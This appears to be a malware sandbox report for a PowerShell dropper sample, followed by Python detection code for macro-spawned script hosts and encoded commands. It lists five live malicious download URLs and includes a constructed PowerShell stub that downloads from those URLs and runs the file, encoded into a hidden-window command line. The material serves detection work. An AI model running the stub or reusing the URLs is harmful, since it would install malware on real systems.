General

  • Target

    27148a2ca26de06491a69e10019524bc_JaffaCakes118

  • Size

    85KB

  • Sample

    240508-2rfxyabg3x

  • MD5

    27148a2ca26de06491a69e10019524bc

  • SHA1

    0ea4f779bdb39bb9be951e44c97f1204b3655082

  • SHA256

    a175a71552d15dfe1539ea84b67fa8ebb2967350b59fa42e2fabe91a603797c8

  • SHA512

    fe4335e99475c172d6f21465eaee71f8ac242dfc05d288a6238d25fdf99db42cecebc095bd5ac96033d78efe092ddaa5a51212938a88560a6f11b269366e3d2d

  • SSDEEP

    1536:pptJlmrJpmxlRw99NBY+a6fcE9AlxXR7dHNB:Xte2dw99flczXXBTB

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs (type: exe.dropper)

    http://southerncalenergysavings.com/ba
    http://progea4d.pl/w
    http://aracfilo.ozgurdagci.com/5fOi9g
    http://test.timkirkhope.com/xFuC78
    http://odd.learnhacking.net/91Jer4V

Targets

    • Target

      27148a2ca26de06491a69e10019524bc_JaffaCakes118

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.
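The three signatures above and the extracted dropper URLs describe one detection problem: an Office process spawns a script host, the command line hides its payload behind PowerShell's -EncodedCommand, and the decoded script walks a list of download URLs. The block below is an added example, not part of the sandbox report or the sample itself: it decodes the encoded command, scores the usual obfuscation markers, extracts URLs, and matches them against the five exe.dropper URLs from the config above. The process-creation events and the PowerShell stub are constructed for the example (the stub is a plausible stand-in for a URL-walking dropper, not the sample's real script), and the parent/child lists are assumptions you would tune to your environment.

```python
"""Detection logic for: Office parent -> script host, -EncodedCommand payloads,
and download URLs matched against the extracted dropper blocklist.
Added example; events and the dropper stub below are constructed, not from the sample."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# The five exe.dropper URLs from the extracted config on this page.
DROPPER_URLS = {
    "http://southerncalenergysavings.com/ba",
    "http://progea4d.pl/w",
    "http://aracfilo.ozgurdagci.com/5fOi9g",
    "http://test.timkirkhope.com/xFuC78",
    "http://odd.learnhacking.net/91Jer4V",
}

# Assumed lists for this example: Office parents that should rarely spawn a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest alternative first.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"""https?://[A-Za-z0-9.\-]+(?:/[^\s'"`,;)]*)?""")

OBFUSCATION_MARKERS = {
    "caret escaping": re.compile(r"\^"),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "bypass policy": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
    "downloader": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bwget\b", re.I),
    "invoke-expression": re.compile(r"\biex\b|Invoke-Expression", re.I),
}


@dataclass
class ProcEvent:
    """Minimal process-creation record (the fields Sysmon Event ID 1 would give you)."""
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    unexpected_child: bool = False
    encoded_command: bool = False
    decoded: Optional[str] = None
    obfuscation_hits: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)
    blocklisted: List[str] = field(default_factory=list)

    @property
    def alert(self) -> bool:
        return self.unexpected_child or bool(self.blocklisted)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; return the script or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(ev: ProcEvent) -> Verdict:
    v = Verdict()
    v.unexpected_child = basename(ev.parent_image) in OFFICE_PARENTS and basename(ev.image) in SCRIPT_HOSTS
    v.decoded = decode_encoded_command(ev.command_line)
    v.encoded_command = v.decoded is not None
    # Score markers over the outer command line and the decoded payload together.
    text = ev.command_line + ("\n" + v.decoded if v.decoded else "")
    v.obfuscation_hits = [name for name, rx in OBFUSCATION_MARKERS.items() if rx.search(text)]
    v.urls = sorted(set(URL_RE.findall(text)))
    v.blocklisted = [u for u in v.urls if u in DROPPER_URLS]
    return v


def encode_command(script: str) -> str:
    """Build what an attacker passes to -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stand-in for a URL-walking ps1 dropper (not the sample's real script):
# try each URL, save to %TEMP%, run the first download that succeeds.
DROPPER_STUB = (
    "$w=New-Object System.Net.WebClient;"
    "$u='http://southerncalenergysavings.com/ba,http://progea4d.pl/w,"
    "http://aracfilo.ozgurdagci.com/5fOi9g'.Split(',');"
    "$p=$env:TEMP+'\\'+'123.exe';"
    "foreach($x in $u){try{$w.DownloadFile($x,$p);Start-Process $p;break}catch{}}"
)

# Constructed events: one macro-style spawn, one admin script, one benign Office child.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c powershell -nop -w hidden -enc " + encode_command(DROPPER_STUB)),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\nightly-backup.ps1"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
]


def run(events=SAMPLE_EVENTS) -> List[Verdict]:
    return [analyze(e) for e in events]


if __name__ == "__main__":
    for ev, v in zip(SAMPLE_EVENTS, run()):
        print(basename(ev.parent_image), "->", basename(ev.image),
              "ALERT" if v.alert else "ok", v.obfuscation_hits, v.blocklisted)
```

Only the first event alerts: WINWORD.EXE spawning cmd.exe is already enough, and decoding the payload adds three of the five blocklisted URLs plus the hidden-window, no-profile and downloader markers. The explorer-launched script and the print helper spawned by Word stay quiet, which is the point of keying on the parent/child pair rather than on powershell.exe alone.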

MITRE ATT&CK Enterprise v15

Tasks